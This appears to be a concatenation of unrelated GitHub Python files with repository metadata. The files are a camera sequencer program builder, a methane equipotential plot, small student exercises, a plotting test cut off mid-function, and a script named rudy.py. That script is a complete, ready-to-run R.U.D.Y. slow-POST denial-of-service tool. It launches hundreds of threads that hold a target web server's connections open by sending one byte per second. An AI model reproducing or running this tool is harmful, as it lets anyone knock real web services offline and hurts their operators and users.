    # @returns A human-readable string representation of the program.
    def as_str(self, labels = None):
        result = [];
        for c in self.codes:
            # Bit 63 flags a mode header word; any other word is a state word.
            if((c >> 63) == 1):
                result.append(Mode.format_code(c, self.address_map));
            else:
                result.append(State.format_code(c, labels));
        return '\n'.join(result);
    ## Gets all the defined mode names in the program.
    #
    # @returns A list of all the mode names (str) in the program.
    def mode_names(self):
        return [m.name for m in self.modes];
    ## Gets the mode with the specified name.
    #
    # @param self An instance of Program
    # @param name (str) The name of the mode
    #
    # @returns A mode with the specified name.
    def get_mode(self, name):
        for mode in self.modes:
            if(name == mode.name):
                return mode;
        # Bugfix: the adjacent string literals in the original swallowed the
        # mode name (the message literally contained "+ str(name) +").
        raise ValueError('Mode with name \'' + str(name) + '\' not found in program.');
    ## Alias for self.as_str(None)
    #
    # @see as_str
    #
    # @param self An instance of Program
    #
    # @returns A human-readable string representation of the program.
    def __str__(self):
        return self.as_str();
    ## Plots the program modes.
    #
    # If a start mode is specified, the plot will simulate a program run.
    #
    # @note: Requires matplotlib to be installed.
    #
    # @param self An instance of Program
    # @param pin_labels ({str:int...}/sequencer.Labels) A mapping between pin names and addresses.
    # @param start_mode (str) The mode in which to start the simulation.
    # @param max_cycles (int) Maximum length of the simulation.
    #
    # @returns A matplotlib handler.
    def plot(self, pin_labels = None, start_mode = None, max_cycles = 100000):
        import matplotlib.pyplot as plots;
        import matplotlib.patches as patches;
        import matplotlib.lines as lines;
        # Determine which modes to plot
        plot_modes = self.modes;
        if(start_mode is not None):
            tot_time = 0;
            nested_count = 0;
            plot_modes = [];
            next_mode = self.get_mode(start_mode);
            while(tot_time < max_cycles):
                current_mode = next_mode;
                next_mode = self.get_mode(current_mode.next_mode_name);
                mode_time = 0;
                mode_multiplier = current_mode.n_loops;
                for state in current_mode.states:
                    mode_time += state.hold_time;
                # n_loops <= 0 means "loop forever": stop the simulation here.
                if(current_mode.n_loops <= 0):
                    plot_modes.append(current_mode);
                    break;
                else:
                    if(current_mode.is_nested()):
                        if(nested_count < current_mode.nested_loops):
                            nested_count += 1;
                            mode_multiplier = 1;
                            next_mode = self.get_mode(current_mode.parent_mode_name);
                        else:
                            mode_multiplier = 0;
                            nested_count = 0;
                    plot_modes.extend([current_mode]*mode_multiplier);
                    tot_time += mode_time * mode_multiplier;
        # Plot modes
        fig = plots.figure();
        axes = fig.add_subplot(111, aspect='equal');
        current_time = 0;
        parity = False;
        plot_values = {};
        for mode in plot_modes:
            current_duration = 0;
            to_plot = mode._expand_states(pin_labels);
            for k in to_plot.keys():
                current_duration = max(current_duration, len(to_plot[k]));
                if(k not in plot_values):
                    # (row index, x samples, y samples) for each pin.
                    plot_values[k] = (len(plot_values), [], []);
            # Shade every other mode so their boundaries are visible.
            if(parity):
                pos_y = 0;
                size_y = len(plot_values.keys());
                pos_x = current_time;
                size_x = current_duration;
                bg = patches.Rectangle((pos_x, pos_y), size_x, size_y, alpha=0.1, facecolor='#000000', edgecolor=None, fill=True);
                axes.add_patch(bg);
            parity = not parity;
            axes.text(current_time + current_duration/2, len(plot_values.keys()) + 1, mode.name,
                horizontalalignment='center',
                verticalalignment='top');
            for k in to_plot.keys():
                axes.text(-0.1 + current_time, plot_values[k][0] + 0.5, k, horizontalalignment='right', verticalalignment='center');
                # Scale each pin's 0/1 trace and stack it on its own row.
                values = [v*0.9 + plot_values[k][0] for v in to_plot[k]];
                plot_values[k][1].extend(six.moves.range(current_time, current_time + current_duration));
                plot_values[k][2].extend(values);
            current_time += current_duration;
        self.log.info('Optimizing plots... ', 2);
        # Drop samples in the middle of constant runs to keep the plot light.
        for pin in plot_values.keys():
            x_values = plot_values[pin][1];
            y_values = plot_values[pin][2];
            if(len(y_values) > 1):
                preserve = [0] + [ii+1 for ii in range(len(y_values) - 2) if y_values[ii] != y_values[ii+1] or y_values[ii+1] != y_values[ii+2]] + [len(y_values) -1];
                x_values = [x_values[ii] for ii in preserve];
                y_values = [y_values[ii] for ii in preserve];
            plots.step(x_values, y_values);
        self.log.info('Done.', 2);
        axes.axis('auto');
        plots.tick_params(
            axis='y',
            which='both',
            bottom='off',
            top='off',
            labelbottom='off',
            labeltop='off');
        return fig;
    ## @var codes
    # ([int...]) Binary value of the memory to be written at each index.
    ## @var address_map
    # ({str:int...}) Cache of the program's modes location.
    ## @var modes
    # ([sequencer.Mode]) Source modes of the program compiled in codes.
    ## @var log
    # (log._Log) The logging context
## A class to build SciCam sequencer programs.
class ProgramBuilder:
    ## Initializes a ProgramBuilder
    #
    # @param self An instance of ProgramBuilder
    # @param log The logging context.
    def __init__(self, log = log.get_default_context()):
        self.modes = [];
        self.log = log;
    ## Adds a mode to the current program
    #
    # Will raise error if another mode with equal name has been registered.
    #
    # @param self An instance of ProgramBuilder
    # @param mode (sequencer.Mode) The mode to add.
    def add_mode(self, mode):
        name = mode.name;
        if(name in self.mode_names()):
            raise ValueError('There is already a mode named ' + str(name));
        self.modes.append(mode);
    ## Gets all the mode names in the program so far.
    #
    # @param self An instance of ProgramBuilder
    #
    # @returns A list of all the mode names (str) in the program.
    def mode_names(self):
        return [m.name for m in self.modes];
    ## Get a mode with a specified name.
    #
    # @param self An instance of ProgramBuilder
    # @param name (str) The name of the mode.
    #
    # @returns The mode (sequencer.Mode) with the specified name.
    def get_mode(self, name):
        for m in self.modes:
            if m.name == name:
                return m;
        raise ValueError('There is no mode named: ' + str(name));
    ## Creates a SciCam sequencer program.
    #
    # @param self An instance of ProgramBuilder
    # @param log (log._Log) The log context to give to the new Program.
    #
    # @returns A compiled program (sequencer.Program).
    def build(self, log=None):
        if(log is None):
            log = self.log;
        # Each mode occupies one header word plus one word per state.
        address_cache = {};
        current_address = 0;
        for mode in self.modes:
            address_cache[mode.name] = current_address;
            current_address += len(mode.states) + 1;
        # Consistency checks
        error = False;
        for mode in self.modes:
            try:
                self.get_mode(mode.next_mode_name);
            # Bugfix: catch only the lookup failure (get_mode raises
            # ValueError); a bare except also swallowed unrelated errors.
            except ValueError:
                error = True;
                # Bugfix: quote the names properly; the original adjacent
                # string literals dropped them from the message.
                self.log.error('Next mode \'' + str(mode.next_mode_name) + '\' for mode ' + str(mode.name) + ' does not exist.');
            if(mode.is_nested()):
                try:
                    parent = self.get_mode(mode.parent_mode_name);
                    if(parent.is_nested()):
                        # Bugfix: the last name must be the grandparent's
                        # (parent.parent_mode_name); the original repeated
                        # the parent's name twice.
                        self.log.warning('Double nested modes detected: ' + str(mode.name) + ' in ' + str(parent.name) + ' in ' + str(parent.parent_mode_name) + '.');
                except ValueError:
                    error = True;
                    self.log.error('Parent mode \'' + str(mode.parent_mode_name) + '\' for mode ' + str(mode.name) + ' does not exist.');
        if(error):
            raise ValueError('Compilation stop because of consistency errors. Check log.');
        codes = [];
        for mode in self.modes:
            codes.append(mode.get_code(self, address_cache));
            for state in mode.states:
                codes.append(state.get_code());
        return Program(codes, address_cache, self.modes, log);
    ## @var modes
    # ([sequencer.Mode...]): List of registered modes.
    ## @var log
    # (log._Log): The logging context.
## A sequencer mode.
#
class Mode:
    ## Default value of a mode address
    _invalid_mode = 2**10 -1;
    ## Maximum value n_loops can have
    _max_n_loops = 2**16 - 1;
    ## Maximum value n_loops_nested can have
    _max_n_loops_nested = 2**16 - 1;
    ## Maximum number of states the mode can have
    _max_n_states = 2**10 - 1;
    ## Initializes a Mode.
    #
    # @param self An instance of Mode
    # @param name (str) The name of the mode.
    # @param n_loops (int) The number of times this mode runs before jumping to the next mode (0 = infinite).
    # @param next_mode_name (str) The name of the mode to jump after this mode finishes.
    # @param parent_mode_name (str) The name of the parent mode of this mode (if this mode is nested).
    # @param nested_loops (int) The number of times to jump to the parent mode before jumping to the next mode.
    def __init__(self, name, n_loops, next_mode_name = None, parent_mode_name = None, nested_loops = None):
        self.name = name;
        # Bugfix: also reject negative values, as the error message advertises.
        if(n_loops < 0 or n_loops > self._max_n_loops):
            raise ValueError('n_loops (' + str(n_loops) + ') is out of range [0...' + str(self._max_n_loops) + '].');
        self.n_loops = n_loops;
        self.next_mode_name = next_mode_name;
        if(parent_mode_name):
            self.parent_mode_name = parent_mode_name;
            # Bugfix: test for a missing value explicitly so nested_loops = 0
            # is accepted, matching the documented range [0...max].
            if(nested_loops is None):
                raise ValueError('Must give a value to nested_loops if parent_mode_name is specified.');
            if(nested_loops < 0 or nested_loops > self._max_n_loops_nested):
                raise ValueError('nested_loops (' + str(nested_loops) + ') is out of range [0...' + str(self._max_n_loops_nested) + '].');
            self.nested_loops = nested_loops;
        self.states = [];
    ## Gets the time evolution of the modes states.
    #
    # Useful for plotting. If pin_labels is provided, names instead of addresses will be keys of to pin states.
    #
    # @param self An instance of Mode
    # @param pin_labels ({str:int...}/sequencer.Labels) A mapping between pin names and addresses.
    #
    # @returns A dict {str:[int...]} containing the time evolution of each pin.
    def _expand_states(self, pin_labels = None):
        pin_dir = pin_labels;
        if(pin_dir is None):
            # Without labels, fall back to the 32 raw pin addresses.
            pin_dir = {};
            for ii in range(32):
                pin_dir[str(ii)] = ii;
        result = {};
        for k in pin_dir.keys():
            result[k] = [];
        for state in self.states:
            for k in pin_dir.keys():
                # Each state's pin value is held for hold_time cycles.
                pin_value = state.get_value_of_address(pin_dir[k]);
                result[k].extend([pin_value]*state.hold_time);
        return result;
    ## Appends a state to the end of the mode
    #
    # @param self An instance of Mode
    # @param state (sequencer.state) The state to add.
    def add_state(self, state):
        if(len(self.states) >= self._max_n_states):
            raise ValueError('Number of states per mode limit (' + str(self._max_n_states) + ') reached.');
        self.states.append(state);
    ## Appends many states to the end of the mode
    #
    # @param self An instance of Mode
    # @param states (iter of sequencer.state) An iterable containing states.
    def add_states(self, states):
        for state in states:
            self.add_state(state);
    ## Get whenever this node has a parent.
    #
    # @returns True if has a parent, False otherwise.
    def is_nested(self):
        return hasattr(self, 'parent_mode_name');
    ## Get the binary data associated with this mode.
    #
    # @param self An instance of Mode
    # @param builder (sequencer.ProgramBuilder) The ProgramBuilder requesting the code.
    # @param address_cache ({str:int...}) The cache of the mode's addresses.
    #
    # @returns The binary code (int) representing this mode.
    def get_code(self, builder, address_cache):
        is_nested = 0;
        nested_loops = 0;
        if(self.is_nested()):
            is_nested = 1;
            nested_loops = self.nested_loops;
        mode_address = address_cache[self.name];
        next_address = self._invalid_mode;
        if(self.next_mode_name):
            next_address = address_cache[self.next_mode_name];
        parent_address = self._invalid_mode;
        if(self.is_nested()):
            parent_address = address_cache[self.parent_mode_name];
        # Bit layout (LSB first): [15:0] nested_loops, [25:16] parent address,
        # [35:26] next address, [36] is_nested flag, [52:37] n_loops,
        # [62:53] number of states, [63] mode-header marker.
        code = 0;
        code = code | nested_loops;
        code = code | (parent_address << 16);
        code = code | (next_address << 26);
        code = code | (is_nested << 36);
        code = code | (self.n_loops << 37);
        code = code | (len(self.states) << 53);
        code = code | (1 << 63);
        return code;
    ## Create a human-readable representation of a mode's code
    #
    # If addresses is provided, modes names will be shown to parent and next modes.
    #
    # @note This is a class method.
    #
    # @param cls An instance of Mode class
    # @param code (int) The code to represent
    # @param addresses ({str:int...}) The cache of the mode's addresses.
    @classmethod
    def format_code(cls, code, addresses = None):
        # Unpack the fields packed by get_code (see bit layout there).
        nested_loops = code & 0xFFFF;
        parent_address = (code >> 16) & 0x3FF;
        next_address = (code >> 26) & 0x3FF;
        is_nested = (code >> 36) & 1;
        n_loops = (code >> 37) & 0xFFFF;
        n_states = (code >> 53) & 0x3FF;
        def conform_str(string, length):
            # Left-pad with spaces up to the requested column width.
            return ' '*max(0, (length - len(string))) + string;
        min_str_len = 3;
        if(addresses):
            min_str_len_label = min_str_len;
            for k in addresses.keys():
                min_str_len_label = max(min_str_len_label, len(k));
            next_label = '<unknown>';
            parent_label = '<unknown>';
            for k in addresses.keys():
                if(addresses[k] == parent_address):
                    parent_label = k;
                if(addresses[k] == next_address):
                    next_label = k;
            data = [1, n_states, n_loops, is_nested, next_label, parent_label, nested_loops];
            data_str = [conform_str(str(s), min_str_len) for s in data];
            data_str[4] = conform_str(data_str[4], min_str_len_label);
            data_str[5] = conform_str(data_str[5], min_str_len_label);
        else:
            data = [1, n_states, n_loops, is_nested, next_address, parent_address, nested_loops];
            data_str = [conform_str(str(s), min_str_len) for s in data];
        return ' '.join(data_str);
    ## @var name (str)
    # The name (str) of the mode.
    ## @var n_loops
    # (int) The number of times this mode runs before jumping to the next mode (0 = infinite).
    ## @var next_mode_name
    # (str) The name of the mode to jump after this mode finishes.
    ## @var parent_mode_name
    # (str) The name of the parent mode of this mode (if this mode is nested).
    ## @var nested_loops
    # (int) The number of times to jump to the parent mode before jumping to the next mode.
    ## @var states
    # ([sequencer.State...]) The states of this mode.
## A sequencer state.
# Contains information of it pin output values and how much time does it have to hold them.
class State:
    # Maximum value for hold_time.
    _max_hold_time = 2**24 - 1;
    ## Initializes a State.
    #
    # @param self An instance of State
    # @param data (int) The value of each pin (in binary) of this mode.
    # @param hold_time (int) The number of cycles this state holds the data.
    def __init__(self, data, hold_time):
        self.data = data;
        if(hold_time < 0 or hold_time > self._max_hold_time):
            raise ValueError('hold_time (' + str(hold_time) + ') is out of range [0...' + str(self._max_hold_time) + '].');
        self.hold_time = hold_time;
    ## Gets the value of a pin of the state.
    #
    # @param self An instance of State
    # @param address (int) The address of the pin.
    #
    # @returns The value of the pin (int). Either 1 or 0.
    def get_value_of_address(self, address):
        return (self.data >> address) & 0x01;
    ## Creates a state from a list of each bit value.
    #
    # @note This is a class method.
    #
    # @param cls An instance of Mode class
    # @param data_bits ([str/int/bool...]) The value of each pin (in binary) of this mode.
    # @param hold_time (int) The number of cycles this state holds the data.
    #
    # @returns A State
    @classmethod
    def from_bits(cls, data_bits, hold_time):
        bits = [int(bool(bit)) for bit in data_bits];
        if(len(bits) > 32):
            # Bugfix: the message was missing the closing parenthesis.
            raise ValueError('Too many bits (' + str(len(bits)) + ') for a sequencer state.');
        if(len(bits) < 32):
            # Bugfix: this is a classmethod, so there is no `self`; the
            # original `self.log.warning(...)` raised NameError here.
            log.get_default_context().warning('There are less bits than expected in state (' + str(len(bits)) + '), will fill MSBs with 0s.');
        data = 0;
        for ii in range(len(bits)):
            data = data | (bits[ii] << ii);
        # Use cls so subclasses get instances of their own type.
        return cls(data, hold_time);
    ## Creates a state from a dictionary of each bit value.
    #
    # @note This is a class method.
    #
    # @param cls An instance of Mode class
    # @param labels ({str:int...}) The address of each pin name.
    # @param named_bits ({str:int/str...}) The value of each pin name.
    # @param hold_time (int): The number of cycles this state holds the data.
    #
    # @returns A State
    @classmethod
    def from_labels(cls, labels, named_bits, hold_time):
        bits = [0]*32;
        for k in named_bits.keys():
            bits[labels[k]] = named_bits[k];
        return cls.from_bits(bits, hold_time);
    ## Creates multiple states from a dictionary.
    #
    # The dictionary `named_bits` has to contains names of each pin name associated.
    # with a tuple containing the values of multiple states. The length of each tuple must
    # match `len(hold_times)`.
    #
    # @note This is a class method.
    #
    # @param cls An instance of Mode class
    # @param labels ({str:int...}) The address of each pin name.
    # @param named_bits ({str:iter(int/str)...}): The values of each pin name.
    # @param hold_times (tuple(int)): The number of cycles this state holds the data for each state.
    #
    # @returns A tuple containing States
    @classmethod
    def from_labels_array(cls, labels, named_bits, hold_times):
        length = len(hold_times);
        for k in named_bits.keys():
            if(len(named_bits[k]) != length):
                raise ValueError('Length of label ' + str(k) + ' (' + str(len(named_bits[k])) + ') does not match length of hold_times (' + str(length) + ').');
        result = [];
        for ii in range(length):
            result.append(cls.from_labels(labels, {k:named_bits[k][ii] for k in named_bits.keys()}, hold_times[ii]));
        return tuple(result);
    ## Create a human-readable representation of a state's code
    #
    # If labels is provided, pin names will be shown instead of addresses.
    #
    # @note This is a class method.
    #
    # @param cls An instance of Mode class
    # @param code (int) The code to represent
    # @param labels ({str:int...}) The name of each pin.
    #
    # @returns A human-readable representation (str) of a state's code
    @classmethod
    def format_code(cls, code, labels = None):
        # Undo the packing done by get_code: data in bits [62:31],
        # hold time in bits [30:7].
        data = (code & 0x7FFFFFFF80000000) >> 31;
        time = (code & 0x7FFFFF80) >> 7;
        data_array = ['']*32;
        for ii in range(32):
            data_array[ii] = (data >> ii) & 1;
            if(labels is None):
                data_array[ii] = str(data_array[ii]);
            else:
                label = None;
                for k in labels.keys():
                    if(labels[k] == ii):
                        label = str(k);
                        break;
                if(label != None):
                    data_array[ii] = str(label) + ':' + str(data_array[ii]) + '\n';
                else:
                    # Unlabeled pins are omitted from the labeled output.
                    data_array[ii] = None;
        if(labels):
            data_array = ['---- hold for: ' + str(time) + ' ----- \n'] + [d for d in data_array if d];
        else:
            data_array = data_array + [', hold for: ' + str(time)];
        return ' '.join(data_array);
    ## Returns the code associated with this state
    #
    # @param self An instance of Mode
    #
    # @returns The code (int) associated with this state
    def get_code(self):
        # Data occupies bits [62:31]; hold time bits [30:7].
        return (self.data << 31) | (self.hold_time << 7);
    ## @var data
    # (int) The value of each pin (in binary) of this mode.
    ## @var hold_time
    # (int) The number of cycles this state holds the data.
## Labels of the pins of the sequencer
# A thin wrapper around a {name: address} dict that rejects duplicated
# addresses on construction and supports reverse (address -> name) lookup.
class Labels:
    ## Initialize a sequencer labels
    #
    # Raises ValueError if two names map to the same address.
    #
    # @param self An instance of Labels
    # @param labels ({str:int...}): The address of each pin name.
    def __init__(self, labels):
        value_to_key = {};
        duplicates = [];
        for key, value in labels.items():
            if(value in value_to_key):
                duplicates.append(key);
            else:
                value_to_key[value] = key;
        if(duplicates):
            detail = ','.join(str(key) + ':' + str(labels[key]) for key in duplicates);
            raise ValueError('There are repeated indexes for labels: ' + detail);
        self.labels = labels;
    ## Gets the address associated with a name
    #
    # @param self An instance of Labels
    # @param label (str) The name of the pin
    #
    # @returns The address (int) associated with the name
    def __getitem__(self, label):
        return self.labels[label];
    ## Gets the name associated with an address
    #
    # @param self An instance of Labels
    # @param address (int) The address of the pin
    #
    # @returns The label (str) associated with the address
    def label_of(self, address):
        for name, addr in self.labels.items():
            if(addr == address):
                return name;
        raise ValueError('There is no label for address ' + str(address));
    ## @var labels
    # ({str:int...}): The address of each pin name.
| [
"noreply@github.com"
] | noreply@github.com |
ad9560f4940ff21422b1436bccf90c34493fc577 | f2a4d90226fb45c9388ae7b0f4b30e7bf50f86e0 | /week2/Python Files/assignment_2_q5_equipot_surf.py | 46ac6754f17b96b70dc6d75aa9d23722a62ede58 | [] | no_license | Souritra-Garai/SRFP2020 | f38dd703029feede14168f31a25875b57be186ee | c8d65cf4c8213fa64af47af11b544f8ae1347fb7 | refs/heads/master | 2022-09-04T03:05:55.061846 | 2020-05-24T12:23:44 | 2020-05-24T12:23:44 | 264,501,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,349 | py | from electric_multipoles import ChargeDistribution, e, Dipole
# Assignment 2, Q5: equipotential surfaces of the methane (CH4) molecule.
# The carbon atom is modeled as an explicit charge distribution and each
# C-H bond as a point dipole; the total potential is sampled on a 3D grid
# and rendered as iso-potential surfaces with Mayavi.
from math import asin, pi
from mayavi.mlab import contour3d
from ai.cs import sp2cart
import numpy as np
# Radius of Carbon atom
r_C = 70e-12 # m
# Radius of Hydrogen atom
r_H = 53e-12 # m
# Carbon - Hydrogen Bond Length
BL_CH = 160e-12 # m
# Half-extent of the cubic sampling region around the molecule.
r_min, r_max = -BL_CH*2, BL_CH*2
# Tetrahedral angle (109.4 deg) - 90 deg
# asin(1/3) ~= 19.47 deg is the depression of the three lower bonds below
# the equatorial plane, giving the tetrahedral separation between bonds.
tet_theta = - asin(1/3)
# Charge Districution for C atom
# (+4e at the origin plus four -e electrons at r_C along the bond axes)
C_chargeArray = [4*e] + [-e]*4
C_chargePosArray = np.array( sp2cart([0] + [r_C]*4, [0, pi/2] + [tet_theta] * 3, [0, 0, -pi/3, pi/3, pi]) ).transpose()
C_ChargeDist = ChargeDistribution(C_chargeArray, C_chargePosArray)
# Array of positions of H atoms
H_PosArray = np.array( sp2cart( [BL_CH]*4 , [pi/2] + [tet_theta] * 3, [0, -pi/3, pi/3, pi] ) ).transpose()
# Array of positions of electron of H atom
# assuming them to be farther away from the C atom
H_e_PosArray = np.array( sp2cart( [BL_CH + r_H]*4 , [pi/2] + [tet_theta] * 3, [0, -pi/3, pi/3, pi] ) ).transpose()
# H atom Dipoles
# (each proton/electron pair is reduced to a point dipole along its bond)
H1 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[0], H_e_PosArray[0]]))
H2 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[1], H_e_PosArray[1]]))
H3 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[2], H_e_PosArray[2]]))
H4 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[3], H_e_PosArray[3]]))
# Grid resolution per axis (20**3 = 8000 potential evaluations).
n_points = 20
x_array = np.linspace(r_min, r_max, n_points)
y_array = np.linspace(r_min, r_max, n_points)
z_array = np.linspace(r_min, r_max, n_points)
V_Tensor = np.zeros((n_points, n_points, n_points))
print('Started calculating V_Tensor')
# Total potential at each grid point = carbon distribution + the four
# C-H bond dipoles (superposition).
for i in range(n_points) :
    x = x_array[i]
    for j in range(n_points) :
        y = y_array[j]
        for k in range(n_points) :
            z = z_array[k]
            pos = np.array([x, y, z])
            V_Tensor[i][j][k] = C_ChargeDist.V(pos) + H1.V(pos) + H2.V(pos) + H3.V(pos) + H4.V(pos)
print('Finished calculating V_Tensor')
# 'ij' indexing keeps the X/Y/Z axis order consistent with the loop above.
X, Y, Z = np.meshgrid( x_array, y_array, z_array, indexing='ij')
# Grid points coinciding with a point charge give +/-inf; replace with NaN
# so the contouring skips them instead of failing.
V_Tensor[ np.isinf(V_Tensor) ] = np.nan
contour3d( X, Y, Z, V_Tensor,
	name='Equipotential surfaces for Methane Molecule',
	contours=50, opacity=0.5, colormap='magma')
waitkey = input() | [
"noreply@github.com"
] | noreply@github.com |
ba9c25204d3852857589bdd57184944ae6d9be2d | e6136dafd25e405300755c37e6d74fd7856e272c | /Lab2/Lab2.py | 3948fbe9cf353495ddb6c4b770dce5742e6e95a8 | [] | no_license | MatthiasMarczyszyn/Systemy_Wbudowane | 16c8bd1e37e2d2c78209d46bc61642951b6eff3a | c00f8887c746b8178461fc23a7ecf8eb0222099c | refs/heads/main | 2023-05-29T12:30:56.234265 | 2021-05-31T19:26:09 | 2021-05-31T19:26:09 | 364,918,917 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,328 | py |
def char_counter_string(string_name: str) -> dict:
    """A simple function that counts how many times each letter occurs in a word.

    Non-letter characters are ignored and counting is case-insensitive
    (letters are lowered before counting).

    Parameters
    ----------
    string_name : str
        A word in which we want to count the letters

    Returns
    -------
    dict
        A dictionary with (lowercase) letters as keys and the number of each
        letter as values

    Example
    -------
    >>> char_counter_string("ala")
    {'a': 2, 'l': 1}
    """
    char_dict = {}
    # Single pass: lower first, keep only letters, count with dict.get to
    # avoid the separate "key already present" branch.
    for char in string_name.lower():
        if char.isalpha():
            char_dict[char] = char_dict.get(char, 0) + 1
    return char_dict
def char_counter_file(file_name: str) -> dict:
    """A simple function that reads a text file, echoes it, and counts its letters.

    Parameters
    ----------
    file_name : str
        The name of the chosen file

    Returns
    -------
    dict
        A dictionary with letters as keys and the number of each letter as values

    Example
    -------
    >>> char_counter_file("Text.tx")
    ala fasfsafa
    ;;;fsdgdhdf
    dasfas[][]
    {'a': 7, 'l': 1, 'f': 6, 's': 5, 'd': 4, 'g': 1, 'h': 1}
    """
    # Read the whole file into memory; the context manager closes it.
    with open(file_name) as source:
        text = source.read()
    # Echo the raw contents before counting.
    print(text)
    # Delegate the actual counting to char_counter_string.
    return char_counter_string(text)
def list_min_value(number_list: list) -> dict:
    """A simple function that finds the smallest value in a list and all its indexes.

    Parameters
    ----------
    number_list : list
        A non-empty list of numbers

    Returns
    -------
    dict
        Dictionary with the smallest value and the list of its indexes

    Raises
    ------
    ValueError
        If number_list is empty (min() of an empty sequence).

    >>> list_min_value([1,2,3,4,1,2,4,23,1])
    {'Minimal Value:': 1, 'Indexes': [0, 4, 8]}
    """
    # Search the minimum in the list.
    min_value = min(number_list)
    # enumerate avoids re-indexing the list by position a second time.
    index_list = [index for index, value in enumerate(number_list) if value == min_value]
    return {"Minimal Value:": min_value, "Indexes": index_list}
| [
"m.marczyszyn@gmail.com"
] | m.marczyszyn@gmail.com |
d8801d1e2ae3d8f288580bc5fd359f92de04d2f9 | 9e06bffb84fc0c9fe7f739d444ba76aeb2a3365f | /While-Loop - Lab/05. Max Number.py | 10af5606cca935f2dfb33a4f91e4d19646122923 | [] | no_license | AngelValAngelov/Python-Basics | c40c6a1d1ba64a91ca52fa06e8ffb1c612e79d49 | 4dd153b8da0c105eafabf50a6fae206390f4ce72 | refs/heads/main | 2023-05-04T17:58:37.370237 | 2021-05-29T20:49:13 | 2021-05-29T20:49:13 | 342,964,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | import sys
n = int(input())
max_number = -sys.maxsize
while n > 0:
number = int(input())
if number > max_number:
max_number = number
n -= 1
print(max_number) | [
"noreply@github.com"
] | noreply@github.com |
ba35f6195d26265971096fb556edf8ec094e9269 | 25287f4c89a6335758f08bb8b201d53742b7de61 | /rudy.py | f410777402c0483516b717dc2c853a7db5ed1613 | [] | no_license | htll/RUDY | a8bbdc498a508189c497972b2f641427a66860c8 | bb0f7647d14dcd719ef508830edd5280a5171c1e | refs/heads/master | 2020-07-01T22:05:07.572047 | 2016-11-20T04:50:21 | 2016-11-20T04:50:21 | 74,252,432 | 2 | 1 | null | 2016-11-20T04:19:24 | 2016-11-20T04:19:24 | null | UTF-8 | Python | false | false | 2,625 | py | #!/usr/bin/env python3
# Copyright Nicolas Pielawski 2016
# Edited by aiglebleu for hightechlowlife.eu
import argparse, threading, socket, time, os
website_post_running = True
def website_post(host, port = 80, length = 1024, time_wait = 1, thread_mode = False):
request = 'POST / HTTP/1.1\r\nHost: {}\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: {}\r\n\r\n'.format(host, length).encode('ascii')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
except:
print("LOL! The server cannot handle more connection... xD")
return
sock.send(request)
for i in range(length):
if not website_post_running and thread_mode:
return
try:
sock.send(b' ')
except:
sock.close()
website_post(host, port, length, time_wait)
time.sleep(time_wait)
sock.close()
website_post(host, port, length, time_wait)
def rudy_attack(host, port = 80, length = 1024, time_wait = 1, thread_nbr = 512):
global website_post_running
website_post_running = True
thread_pool = []
for i in range(thread_nbr):
thread_pool.append(threading.Thread(None, website_post, None, (host, port, length, time_wait, True)))
thread_pool[i].start()
print("{} threads started to attack {}:{}!\r".format(i+1, host, port))
print()
print('Processing RUDY attack, now!')
print('Press enter key to stop the attack...')
input()
print("Closing...")
website_post_running = False
for thr in thread_pool:
thr.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Processes the RUDY attack on an arbitrary target.',
epilog='And that\'s how you burst a server with no zombies ;)')
parser.add_argument('server', help='Hostname or ip of the target to focus')
parser.add_argument('-p', '--port', metavar='port', type=int, default=80, help='Port of the target to focus')
parser.add_argument('-l', '--length', metavar='packet_len', type=int, default=1024, help='Length of the TCP Packet (without HTTP header)')
parser.add_argument('-t', '--time', metavar='packet_time', default=1, help='Amount of time to wait between two TCP packets send.')
parser.add_argument('-n', '--thread', metavar='count', default=512, help='Amount of clients that are going to contact the server.')
args = parser.parse_args()
rudy_attack(args.server, int(args.port), int(args.length), int(args.time), int(args.thread))
| [
"aiglebleu@openmailbox.org"
] | aiglebleu@openmailbox.org |
99c24d8908cc8d2ec3cec6a30bd5b6c931f9ffb9 | 56b81a46107acebb24be67368b4fb17d440f423a | /JPlot/examples/plotTest.py | 02f0e15f19ca0af3d22b18f8952c9993adf659ba | [
"Apache-2.0",
"MIT"
] | permissive | Thesys-lab/InMemoryCachingWorkloadAnalysis | 451dec27eb7fbb9bdf4bd1258e3c0690f029464e | 5f6f9f7e29a164478f3fc28eb64c170bbbafdec7 | refs/heads/master | 2023-01-04T09:55:32.459308 | 2020-09-30T15:50:21 | 2020-09-30T15:50:21 | 291,110,974 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,572 | py |
import JPlot.pyplot as plt
from matplotlib.ticker import MaxNLocator
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
import numpy as np
import os
import sys
sys.path.append("../")
def test_plot1():
    """Render eight offset straight lines, save the figure (with TeX data), clear."""
    xs = range(20)
    for offset in range(8):
        plt.plot(xs, [base + offset * 8 for base in xs])
    plt.savefig("test.png", save_tex=True)
    plt.clf()
def test_replot():
    """Rebuild the figure from the JSON plot data written by a previous savefig."""
    plt.replot_using_saved_data("test.png.plotData.json")
def test_subplots():
    """Two side-by-side shared-y subplots with filled areas and a custom legend."""
    # 1x2 grid with no gap between the two panels.
    fig, axes = plt.subplots(1, 2, figsize=(10, 4),
                             gridspec_kw={"wspace": 0, "hspace": 0},
                             subplot_kw={"sharey": True, "frame_on": True}
                             )
    # Left panel: increasing ramp with a translucent fill under it.
    d = np.arange(0, 20)
    axes[0].plot(d, d, )
    axes[0].fill_between(y1=d, x=d, alpha=0.2)
    # Right panel: decreasing ramp; y ticks removed since the axis is shared.
    d2 = np.arange(20, 0, -1)
    axes[1].plot(d2, d2, )
    axes[1].fill_between(y1=d2, x=d2, alpha=0.2)
    axes[1].set_yticks([])
    # Hand-built legend entries (proxy artists) instead of labeled plots.
    legend_elements = [Line2D([0], [0], color='red', lw=2, ls='-', label='la'),
                       Line2D([0], [0], color='green',
                              lw=2.5, ls='--', label='lb'),
